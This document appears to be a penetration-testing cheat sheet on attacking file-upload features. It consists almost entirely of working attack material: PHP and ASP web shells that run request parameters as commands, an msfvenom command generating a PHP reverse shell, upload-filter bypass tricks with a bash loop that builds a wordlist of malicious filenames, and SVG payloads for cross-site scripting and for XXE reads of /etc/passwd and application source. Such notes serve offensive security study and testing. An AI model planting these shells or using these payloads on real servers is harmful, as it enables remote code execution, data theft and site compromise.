# Web Shells
```bash
# Basic PHP File Read
<?php echo file_get_contents('/etc/passwd'); ?>
# Basic PHP Command Execution
<?php system('hostname'); ?>
# Basic PHP WebShell
<?php system($_REQUEST['cmd']); ?>
# Basic ASP WebShell
<% eval request('cmd') %>
# Generate PHP reverse shell
msfvenom -p php/reverse_php LHOST=<IP> LPORT_<PORT> -f raw > reverse.php
# phpbash
https://github.com/Arrexel/phpbash
# php reverse shell
https://github.com/pentestmonkey/php-reverse-shell
# seclists web/reverse shells
https://github.com/danielmiessler/SecLists/tree/master/Web-Shells
```
# Bypasses
```bash
# Client-Side Bypass
Toggle Page Inspector
# Blacklist Bypass
.phtml, pHp, php7, phar, etc.
# PHP extensions
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
# ASP extensions
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
# Web extensions
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt
# Whitelist Bypass
## Double extension
shell.jpg.php
# Reverse double extension
shell.php.jpg
# Character Injection
`%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…`, `:`
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
# Content/Type Bypass
## List of All Content Types
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt
cat web-all-content-types.txt | grep 'image/' > image-content-types.txt
# File Signatures / Magic Bytes
https://en.wikipedia.org/wiki/List_of_file_signatures
```
# Limited Uploads
```bash
XSS
- HTML, JS, SVG, GIF
XXE/SSRF
- XML, SVG, PDF, PPT, DOC
# payload 1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>
# payload 2
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
# payload 3
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
DoS
- ZIP, JPG, PNG
```